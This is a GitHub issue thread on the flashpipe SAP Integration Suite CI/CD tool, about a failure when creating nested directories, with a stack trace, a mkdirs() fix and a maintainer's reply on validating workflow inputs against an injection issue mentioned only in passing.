search

engswee / flashpipe

The CI/CD Companion for SAP Integration Suite
https://engswee.github.io/flashpipe/
Apache License 2.0
33 stars 11 forks source link

Problem with recursive directory creation #3

Closed ambravo closed 3 years ago

ambravo commented 3 years ago

Issue When synchronising a package and the target directory does not exist in the repo, and the target includes multiple subdirectories, the process fails and the workflow is aborted.

Could the input be sanitised as well?

Example Actions ยท amba-cpiou-demo-fp 2021-07-08 at 10 59 27 am

Guilty? https://github.com/engswee/flashpipe/blob/88569403330099d55a3a648a26497dcb3ae10f18/src/main/groovy/io/github/engswee/flashpipe/cpi/exec/DownloadIntegrationPackageContent.groovy#L130

Possible solution? Use File.mkdirs()

               // (2) If IFlow does not exist in Git, then add it
                if (!new File(gitSrcDir).exists()) {
                    new File(gitSrcDir).mkdirs()   //<<<<<---- Here
                }

Stack trace

2021-07-08T08:58:33.5782447Z Exception in thread "main" java.lang.reflect.UndeclaredThrowableException 2021-07-08T08:58:33.5789056Z at com.sun.proxy.$Proxy19.accept(Unknown Source) 2021-07-08T08:58:33.5790146Z at java.util.stream.ForEachOps$ForEachOp$OfRef.accept(ForEachOps.java:183) 2021-07-08T08:58:33.5794206Z at java.util.stream.ReferencePipeline$3$1.accept(ReferencePipeline.java:193) 2021-07-08T08:58:33.5798588Z at java.util.Iterator.forEachRemaining(Iterator.java:116) 2021-07-08T08:58:33.5800275Z at java.util.Spliterators$IteratorSpliterator.forEachRemaining(Spliterators.java:1801) 2021-07-08T08:58:33.5806258Z at java.util.stream.AbstractPipeline.copyInto(AbstractPipeline.java:482) 2021-07-08T08:58:33.5807910Z at java.util.stream.AbstractPipeline.wrapAndCopyInto(AbstractPipeline.java:472) 2021-07-08T08:58:33.5814108Z at java.util.stream.ForEachOps$ForEachOp.evaluateSequential(ForEachOps.java:150) 2021-07-08T08:58:33.5815579Z at java.util.stream.ForEachOps$ForEachOp$OfRef.evaluateSequential(ForEachOps.java:173) 2021-07-08T08:58:33.5831099Z at java.util.stream.AbstractPipeline.evaluate(AbstractPipeline.java:234) 2021-07-08T08:58:33.5832588Z at java.util.stream.ReferencePipeline.forEach(ReferencePipeline.java:485) 2021-07-08T08:58:33.5869496Z at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) 2021-07-08T08:58:33.5871232Z at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) 2021-07-08T08:58:33.5905415Z at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) 2021-07-08T08:58:33.5907125Z at java.lang.reflect.Method.invoke(Method.java:498) 2021-07-08T08:58:33.5909197Z at org.codehaus.groovy.runtime.callsite.PojoMetaMethodSite$PojoCachedMethodSiteNoUnwrap.invoke(PojoMetaMethodSite.java:213) 2021-07-08T08:58:33.5912051Z at org.codehaus.groovy.runtime.callsite.PojoMetaMethodSite.call(PojoMetaMethodSite.java:56) 2021-07-08T08:58:33.5914335Z at org.codehaus.groovy.runtime.callsite.CallSiteArray.defaultCall(CallSiteArray.java:47) 2021-07-08T08:58:33.5916976Z at org.codehaus.groovy.runtime.callsite.AbstractCallSite.call(AbstractCallSite.java:116) 2021-07-08T08:58:33.5919297Z at org.codehaus.groovy.runtime.callsite.AbstractCallSite.call(AbstractCallSite.java:128) 2021-07-08T08:58:33.5922735Z at io.github.engswee.flashpipe.cpi.exec.DownloadIntegrationPackageContent.copyDirectory(DownloadIntegrationPackageContent.groovy:190) 2021-07-08T08:58:33.5925484Z at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) 2021-07-08T08:58:33.5927033Z at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) 2021-07-08T08:58:33.5929082Z at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) 2021-07-08T08:58:33.5930558Z at java.lang.reflect.Method.invoke(Method.java:498) 2021-07-08T08:58:33.5932579Z at org.codehaus.groovy.runtime.callsite.PogoMetaMethodSite$PogoCachedMethodSiteNoUnwrap.invoke(PogoMetaMethodSite.java:190) 2021-07-08T08:58:33.5935470Z at org.codehaus.groovy.runtime.callsite.PogoMetaMethodSite.callCurrent(PogoMetaMethodSite.java:59) 2021-07-08T08:58:33.5938333Z at org.codehaus.groovy.runtime.callsite.CallSiteArray.defaultCallCurrent(CallSiteArray.java:51) 2021-07-08T08:58:33.5940858Z at org.codehaus.groovy.runtime.callsite.AbstractCallSite.callCurrent(AbstractCallSite.java:157) 2021-07-08T08:58:33.5943308Z at org.codehaus.groovy.runtime.callsite.AbstractCallSite.callCurrent(AbstractCallSite.java:177) 2021-07-08T08:58:33.5946752Z at io.github.engswee.flashpipe.cpi.exec.DownloadIntegrationPackageContent.execute(DownloadIntegrationPackageContent.groovy:133) 2021-07-08T08:58:33.5950635Z at io.github.engswee.flashpipe.cpi.exec.DownloadIntegrationPackageContent$execute.call(Unknown Source) 2021-07-08T08:58:33.5953634Z at org.codehaus.groovy.runtime.callsite.CallSiteArray.defaultCall(CallSiteArray.java:47) 2021-07-08T08:58:33.5955788Z at org.codehaus.groovy.runtime.callsite.AbstractCallSite.call(AbstractCallSite.java:116) 2021-07-08T08:58:33.5958064Z at org.codehaus.groovy.runtime.callsite.AbstractCallSite.call(AbstractCallSite.java:120) 2021-07-08T08:58:33.5961992Z at io.github.engswee.flashpipe.cpi.exec.DownloadIntegrationPackageContent.main(DownloadIntegrationPackageContent.groovy:20) 2021-07-08T08:58:33.5973066Z Caused by: java.nio.file.NoSuchFileException: /__w/xxxxxx-removed-xxxxxxxx 2021-07-08T08:58:33.5975104Z at sun.nio.fs.UnixException.translateToIOException(UnixException.java:86) 2021-07-08T08:58:33.5977560Z at sun.nio.fs.UnixException.rethrowAsIOException(UnixException.java:102) 2021-07-08T08:58:33.5979753Z at sun.nio.fs.UnixException.rethrowAsIOException(UnixException.java:107) 2021-07-08T08:58:33.5981272Z at sun.nio.fs.UnixCopyFile.copyDirectory(UnixCopyFile.java:136) 2021-07-08T08:58:33.5982307Z at sun.nio.fs.UnixCopyFile.copy(UnixCopyFile.java:572) 2021-07-08T08:58:33.5983469Z at sun.nio.fs.UnixFileSystemProvider.copy(UnixFileSystemProvider.java:253) 2021-07-08T08:58:33.5984564Z at java.nio.file.Files.copy(Files.java:1274) 2021-07-08T08:58:33.5985597Z at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) 2021-07-08T08:58:33.5987131Z at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) 2021-07-08T08:58:33.5988976Z at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) 2021-07-08T08:58:33.5990425Z at java.lang.reflect.Method.invoke(Method.java:498) 2021-07-08T08:58:33.5991718Z at org.codehaus.groovy.reflection.CachedMethod.invoke(CachedMethod.java:98) 2021-07-08T08:58:33.5993130Z at groovy.lang.MetaMethod.doMethodInvoke(MetaMethod.java:325) 2021-07-08T08:58:33.5994984Z at org.codehaus.groovy.runtime.callsite.StaticMetaMethodSite.invoke(StaticMetaMethodSite.java:46) 2021-07-08T08:58:33.5997461Z at org.codehaus.groovy.runtime.callsite.StaticMetaMethodSite.call(StaticMetaMethodSite.java:91) 2021-07-08T08:58:33.6001282Z at org.codehaus.groovy.runtime.callsite.CallSiteArray.defaultCall(CallSiteArray.java:47) 2021-07-08T08:58:33.6004577Z at org.codehaus.groovy.runtime.callsite.AbstractCallSite.call(AbstractCallSite.java:116) 2021-07-08T08:58:33.6006667Z at org.codehaus.groovy.runtime.callsite.AbstractCallSite.call(AbstractCallSite.java:144) 2021-07-08T08:58:33.6009507Z at io.github.engswee.flashpipe.cpi.exec.DownloadIntegrationPackageContent$_copyDirectory_closure4.doCall(DownloadIntegrationPackageContent.groovy:192) 2021-07-08T08:58:33.6011973Z at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) 2021-07-08T08:58:33.6013689Z at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) 2021-07-08T08:58:33.6016081Z at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) 2021-07-08T08:58:33.6017841Z at java.lang.reflect.Method.invoke(Method.java:498) 2021-07-08T08:58:33.6019320Z at org.codehaus.groovy.reflection.CachedMethod.invoke(CachedMethod.java:98) 2021-07-08T08:58:33.6021015Z at groovy.lang.MetaMethod.doMethodInvoke(MetaMethod.java:325) 2021-07-08T08:58:33.6023115Z at org.codehaus.groovy.runtime.metaclass.ClosureMetaClass.invokeMethod(ClosureMetaClass.java:264) 2021-07-08T08:58:33.6025042Z at groovy.lang.MetaClassImpl.invokeMethod(MetaClassImpl.java:1034) 2021-07-08T08:58:33.6026166Z at groovy.lang.Closure.call(Closure.java:420) 2021-07-08T08:58:33.6027526Z at org.codehaus.groovy.runtime.ConvertedClosure.invokeCustom(ConvertedClosure.java:54) 2021-07-08T08:58:33.6029421Z at org.codehaus.groovy.runtime.ConversionHandler.invoke(ConversionHandler.java:124) 2021-07-08T08:58:33.6030470Z ... 36 more

engswee commented 3 years ago

Wow. Looks like you are really giving this a go ๐Ÿ˜‰ Thanks!

Thanks for such a detailed description of the issue... and the possible solution as well. Indeed mkdirs() would fix this.

What are your thoughts on sanitising the input?

P.S.: In future, you are always welcome to submit a PR ๐Ÿ˜‰

ambravo commented 3 years ago

I will consider the PR next time. I believe the hardest part of that, is to recreate the scenario locally.

In regards to sanitising, I don't have anything in mind. However, using gstrings without sanitisation makes me uncomfortable. An image will speak louder. See the example bellow, I believe you will guess how it ended ๐Ÿ˜….

Actions ยท amba-cpiou-demo-fp 2021-07-08 at 5 12 39 pm

engswee commented 3 years ago

Nice catch! You really have a knack for finding security loopholes! ๐Ÿ˜‚

The issue is actually not with GString interpolation. It happens way before it even reaches the Java/Groovy bit.

The value resolved at the workflow level when setting the dynamic environment variable using echo. This is quite specific to GitHub Actions.

image

Nevertheless, validating the values of input still makes sense so I'm including that in the next release which will be out pretty soon.

Thanks again for the feedback!